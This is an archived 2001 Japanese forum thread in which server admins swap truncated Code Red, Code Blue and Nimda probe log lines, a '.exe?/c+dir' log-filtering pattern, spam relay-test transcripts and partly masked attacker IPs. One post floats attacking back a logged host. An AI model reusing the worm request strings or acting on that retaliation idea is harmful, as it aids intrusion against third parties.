黙らせると犯罪なの?

814 : :01/09/18 23:45
うちさ、インターリンクなんだけど、

前回のときもそうだったんだけど、セグメントごと
混み混みになっちゃうんだよね。
だから同じセグメントにNTがいたりすると遅くて遅くて。。

なんとかなんないの??

815 :名無しさん@お腹いっぱい。:01/09/18 23:47
インターリンクのサポートにログ晒せば?

816 :782:01/09/18 23:49
気軽に亀レスしてしまったのですが、そろそろ
話題まとめる為にも誰か、新スレ立てていただけませんか?

817 : :01/09/18 23:49
>>815
おうよ。

それ前回やって苦情電話もした。
そのせいかどうか知らないけど、どうやらNTユーザを
強制切断したみたいだよ。

818 :しみじみクン:01/09/18 23:50
ところで…ていうか、なんかきてるよ、新種!うちはFreeBSDなんですが、22:30から、きまくってます!root.exeとか、探すんじゃネエ!って感じですが、いいかげんにしてほしい…今回はうちで鯖が本稼動してるんで、あした会社に行ってログみるのが鬱だ詩嚢…

819 :786:01/09/18 23:50
うちはOCNなんだけど、ダイアルアップ臭い奴からもきてるのねん。
サポートにログ晒しても…OCNだし(ワラ

はぁ…

820 :しみじみクン:01/09/18 23:52
連続スマソ…
いい忘れてた、誰か新スレ立てて!

821 :ななし:01/09/18 23:55
つーか2KのHDD消去してくれればいいのに・・・>Code Blue

822 :怖くなった:01/09/18 23:55
あ〜〜〜、新しい発言もなく、皆様と同じです、アパッチへ
無効root.exe 以下省略アタック。
午後10時半からです。すげぇいきおい。新スレッドキボン。
むちゃくるねぇ〜、CodeREDの影響なのかなぁ。Xデイだったのでしょうかね。
ida 一回のとはわけが違うのでウザイ。

823 :名無しさん@お腹いっぱい。:01/09/18 23:58
あーーーーーー
遅ーーーーーーえーーーーーーーーーーー!
なんとかしてくれ=========
NTとめろ
2000とめろ

この世はUNIXだけで成り立つべきだーーーーーー。

824 :名無しさん@お腹いっぱい。:01/09/18 23:59
前に作ったCode Redのログ分離ツールは GET /def で
判断するだけで済んだけど、Code Blueの分離はなんか
めんどそうだなー

825 :名無しさん@お腹いっぱい。:01/09/19 00:01
>>824
.exe?/c+dir HTTP/1.0 でどうよ?

826 : :01/09/19 00:02
ここでさらしてよかですか?

827 :名無しさん@お腹いっぱい。:01/09/19 00:03
鬱だ…
見なかったことにして帰ろうっと♪

828 :名無しさん@お腹いっぱい。:01/09/19 00:01
うちもすんげー来る、腹立つ
まわりに NT+IIS 使ってるところないからよくわからんけど
これって codered の穴ふさいであってもやられるの?

829 :名無しさん@お腹いっぱい。:01/09/19 00:03
スレ立てたよ

830 :名無しさん@お腹いっぱい。:01/09/19 00:04
うちもすんげー来る、腹立つ
まわりに NT+IIS 使ってるところないからよくわからんけど
これって codered の穴ふさいであってもやられるの?

831 :名無しさん@お腹いっぱい。:01/09/19 00:04
>>824
あ 本当だ。thx

832 :名無しさん@お腹いっぱい。:01/09/19 00:05
>828
やられました
はぁ これじゃ厨房ですよ (c)TBS

833 :名無し:01/09/19 00:06
まじで行数が多すぎる

834 :名無しさん@お腹いっぱい。:01/09/19 00:06
塞いであってもパケットは容赦なくとんでくる

835 :782:01/09/19 00:06
>>829
どもです。

ということで、続きはこちらで。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000824954

836 :782:01/09/19 00:10
>>835
ごめんなさい。↑のは新スレではありません。


正しくは↓ですね

◆Code Blue◆ 2000厨は逝ってよし
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000825375

鬱だ。

837 :>:01/09/23 16:21
Nimda 騒動でこのスレ下がったけど、
CodeRedまだ収まってないよ。。。。

838 :名無しさん@お腹いっぱい。:01/09/23 17:32
ときどきNimdaログに混じってCodeRedログが発見される

839 :>:01/09/24 01:20
NimdaとCodeRed両方のhttpアクセスとばしてきてるサイトがある。
注意してやろうかと思って、メールしようと思ったら、、
そこのドメインってDNSでmxレコードが設定されない。。。。。
ところで、試しにそこのマシンに25番ポートをつつくと
MSのSMTPが応答する。
1.外部メール交換したくないなら、自営ドメインを何故たてる?
2.なんで25番をあけたままにする。?

こういう運用をしている人たちがいるから感染広がるだろうね。

840 :なんとかして:01/09/24 04:29
[2001/09/24 3:51:54] CodeRed Type XXXXX from: 210.136.65.xx / g065018.ap.plala.or.jp
[2001/09/24 3:55:59] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:04] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:10] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:16] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:23] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:28] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:34] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:39] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:45] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:51] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:56:57] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:57:02] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:57:53] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:57:58] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:58:04] --unknown-- from: 202.132.46.xx /
[2001/09/24 3:58:10] --unknown-- from: 202.132.46.xx /
[2001/09/24 4:22:22] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:23] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:24] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:24] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:25] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:25] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:26] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:26] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:27] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:28] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp
[2001/09/24 4:22:29] --unknown-- from: 202.16.214.xx / nihei.ph.sci.toho-u.ac.jp

841 :名無しさん@お腹いっぱい:01/09/24 04:53
>840
なんとかって、言われても伏せ字 XX じゃだめじゃないのか?

あっ、でもあとみえるね。やっちゃいましょうか?

842 :アナログから光までオッケー:01/09/24 16:39
テロの映像・写真を使って、ムービーを作ってみました。

http://isweb36.infoseek.co.jp/photo/sanorock/

このサイトはみなさんのインターネット環境の
スピードを計ってくれます。また、遅いと思う
人は設定を少し変えることによって無料で
スピードを早くすることができます。
お金を出す前に一度試してみては
いかがでしょうか。上がりの計測も可能です。

http://cym10262.omosiro.com/

843 :まっか:01/09/24 16:50
>>840
それは、東邦大学
http://www.toho-u.ac.jp/index.html
職員採用のページへでも書いてやれ!

844 : :01/09/24 17:54
>>839
単にDNSにMXレコード書いてないだけでメールサーバは
普通に動いてるんなら届くんでないの?

845 :え〜ん ◆EeeenOwI :01/09/26 00:32
なんかこっちの方が落ち着くなあ

今度IBMのノート買ってしまったYO

846 :>:01/09/28 15:22
CodeRedだっておさまってねえ。
nimdaだってCodeRedと無関係ではない
で age とくよ

847 ::01/09/29 13:23
CodeRed おさまらないので age

848 : :01/09/29 13:29
うちにもよく来るのでsage

849 ::01/09/29 13:36
もうすぐ 9月と10月の境目。。
ここでおさまるのか?

850 :名無しさん@お腹いっぱい。:01/09/29 22:13
>>849
そういう説があるけど、信頼できる話なの?(^^;

851 :すぱむスパムSPAM:01/09/29 22:55
From : dnaxs384a@msn.com
Reply-To :
chantaldenboer2713@excite.com


To : 10bqgh@msn.com
Subject : Got Debt? [ndywg]
Received: from [198.78.9.50] by hotmail.com (3.2) with ESMTP id MHotMail***;
Received: from kkgky.msn.com (212.216.22.67 [212.216.22.67]) by exchange@durdene.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2448.0)id S3MJ4TW0; Thu, 27 Sep 2001 21:47:48 -0400
From dnaxs384a@msn.com Thu, 27 Sep 2001 18:37:39 -0700
−−−−−
mail.durdene.com (pri=1)
<<< 220 exchange@mail.durdene.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:<"TEST http://www.nanet.co.jp/rlytest/ requested from mail2.playsic.com[139.142.205.227]"@mail.durdene.com>
<<< 250 OK - mail from <"TEST http://www.nanet.co.jp/rlytest/ requested from mail2.playsic.com[139.142.205.227]"@mail.durdene.com>
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection

問題あり:不正な中継を受け付けます。

(198.78.9.50)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

Info@your411ToWin.com

160000001E@mail2.playsic.com

dnaxs384a@msn.com

chantaldenboer2713@excite.com

10bqgh@msn.com

exchange@mail.durdene.com

852 :名無しさん@お腹いっぱい。:01/10/01 11:20
うちは確かに 10/1 04:00 (JST) 以降は "XXX" が来てない。
おさまった?

853 :名無しさん@お腹いっぱい。:01/10/01 12:41
[01/Oct/2001:07:07:01 +0900] "GET /default.ida?XXXXX・・・

うちはこれが最後だな

854 : :01/10/01 20:55
終わったみたいだね。
しかし16倍うるさいのが来るようになっちゃってるからなあ。

855 ::01/10/01 21:15
8:44 にきて
しばらく来ないので収まったと思ったら
14:43にきて
17:26にもきた。

10月1日云々というのが汚染マシンのローカルカレンダ見ての
振る舞いだったらカレンダ狂ってるマシンあれば
何日になってもくるのではないかいな。。

856 :名無しさん@お腹いっぱい。 :01/10/01 21:24
ハワイはもう10/1になっているかな?

857 ::01/10/02 08:59
211.242.80.33 - - [01/Oct/2001:14:43:12 +0900]
211.237.226.184 - - [01/Oct/2001:17:26:35 +0900]
211.225.158.6 - - [01/Oct/2001:23:22:43 +0900]
211.186.93.243 - - [02/Oct/2001:00:31:30 +0900]
211.222.226.249 - - [02/Oct/2001:00:45:51 +0900]
211.222.226.249 - - [02/Oct/2001:00:49:38 +0900]
211.96.111.55 - - [02/Oct/2001:01:49:07 +0900] "


10月2日になってもまだあるな。。。

858 :( ´Д`):01/10/02 14:48
うちは
202.103.99.190 - - [01/Oct/2001:06:18:56 +0900]
が最後。

859 :名無しさん@お腹いっぱい。:01/10/02 18:36
61.138.94.57 - - [01/Oct/2001:07:06:04 +0900]
うちはコイツだな。
見に行ったらNimdaにも感染してたよ。

860 :(゚Д゚):01/10/03 14:03
あのさ、コードレッドの中身っぽい題名なしテキストメールが届いたんだけど、
なんかの仕業?新型ですか?

861 :(゚Д゚):01/10/03 14:05
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> >
〜中略〜
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> >
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> > XXXXXXXXXX
> > > %`;vL36I

こんなの。

862 :(゚Д゚):01/10/03 14:22
反応なしってことは、みんな知らないってことか。
誰かのイタズラか?

863 :(゚Д゚):01/10/03 14:35
もしかして、NIMDA?

864 :名無しさん@お腹いっぱい。:01/10/03 15:16
CodeRed2だよ

865 :すぱむスパムSPAM:01/10/03 15:20
From : 752luq5f5n@msn.com
Reply-To : laurenevallejo1691@excite.com
To : j310knlqx5d@msn.com
Subject : Do you owe the IRS money? [l5db4]
Received: from [199.233.104.147] by hotmail.com (3.2) with ESMTP id MHotMail***; *, * * 2001 **:**:** -0700
Received: from tkwof.msn.com (wc-client01.ntelos.net [216.12.96.66]) by mandan.combination.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)id TYM3YP85; Tue, 2 Oct 2001 16:43:15 -0500
From 752luq5f5n@msn.com Tue, 02 Oct 2001 14:50:04 -0700

viking.combination.com (pri=10)
<<< 220 mandan.combination.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2650.21) ready
>>> HELO rlytest.nanet.co.jp
<<< 250 OK
>>> MAIL FROM:< TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
<<< 250 OK - mail from < TEST http://www.nanet.co.jp/rlytest/ requested from wc-client01.ntelos.net_216.12.96.66@viking.combination.com >
>>> RCPT TO:<rlytest@nanet.co.jp>
<<< 250 OK - Recipient <rlytest@nanet.co.jp>
>>> QUIT
<<< 221 closing connection
問題あり:不正な中継を受け付けます。
(199.233.104.147)
ORBS database...登録されていません。
VIX realtime block list...登録されていません。

866 :(゚Д゚):01/10/03 15:38
>>864 さん

CodeRed2はメール出すの?

867 :名無しさん@お腹いっぱい。:01/10/04 08:08
>>866 ワラタ

868 :(゚Д゚):01/10/04 11:52
>> 867

え?どう意味?
「おまえそんなことも知らないの?ワラタ」
って意味??

だったら、恥ずかしい、モジモジ。

869 :名無しさん@お腹いっぱい。:01/10/04 12:04
>>868
メールは出さないはず、確か。
で、861のメールの正体は分かったの?
漏れもよく分からないんだが。

「…こんなログが残ってるんですけど
 何?」っていうメールを書いている
途中に送信しちゃったとか?

870 :(゚Д゚):01/10/04 12:17
>>869

ですよねー!!(ホッ。。
多分そんな感じだと思うんですけど、、(人為的なミス

取引先から言われて調べてるんですが、
ヘッダみたいからメール頂戴っていったら、
もう消しちゃったって。どうにもなんねッス。

なんかわかったら、報告入れます。

871 :名無しさん@お腹いっぱい。:01/10/07 00:03
あちこちで反省汁ってたま〜に見るね。
地味に流行ってる?w

872 :名無しさん@お腹いっぱい。:01/10/07 00:45
最近、ノートンのログに1つか2つだけhttpが記録されてるけど、これはニムダ?
コードレッドの時は3回連続で記録されてたが…

873 ::01/10/07 01:38
>>871
反省汁は速報板で急激に流行たけど何か?

874 :名無しさん@お腹いっぱい。:01/10/08 21:55
http://teri.2ch.net/korea/kako/994/994719628.html
>>849

反省しる!→つくる会教科書に抗議をするため国会で座り込みをした
        韓国国会議員が掲げたプラカードに書かれた言葉。反省汁。
        http://japan.donga.com/data/20010412/photo/2001041212148.jpg

875 :名無しさん@お腹いっぱい。:01/10/09 12:17
なんか codered 全然来ないんすけど。ここ数日
因みに、ウチの最初のオクテットと同じ cn,kr,tw,hk をはじいてます。
ちょっとさびしい...

876 :ニンダ:01/10/09 20:23
Ninda Ninda 〜♪Ninda Ninda Ninda 〜♪

http://ton.2ch.net/test/read.cgi/sec/1001864573/339

877 :名無しさん@お腹いっぱい。:01/10/09 23:24
そろそろ、引越したいが、スレ立てすぎとかいわれたし鬱だ

878 :名無しさん@お腹いっぱい。:01/10/12 15:48
今さらかよ!

[12/Oct/2001:15:20:17 +0900] "GET /default.ida?NNNNNNNNNN

何日ぶりだろう。おめでてーな。

「Code Red Re-Release?」
http://www.incidents.org/diary/october01/100901.php#4

おもしろくもないのでsage

879 :名無しさん@お腹いっぱい。:01/10/14 02:31
>>878

ううう・・・。
213.179.221.137

880 :875:01/10/16 15:54
ウチも久しぶりに今日一発来ました。
懐かしいね、おーよしよしって感じ。

881 :名無しさん@お腹いっぱい。:01/10/16 21:22
http://www.nikkei.co.jp/news/seiji/20011015CIII043515.html

まぬけな福田官房長官は逝ってよし。

882 :名無しさん@お腹いっぱい。:01/10/19 20:21
ウイルス関連のカキコも、注意も減っている・・。

こんなときが危ないんだよ。コードレッドのあと、ニムダが発生する直前のようだ・・。

883 :ERROR:名前いれてちょ。。。:01/10/19 21:28
このひとからもらってください。
http://www.machibbs.com/touhoku/bbs/read.cgi?BBS=touhoku&KEY=1003494596
の26

ちなみに八戸工業高校の教員らしいYO

226 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)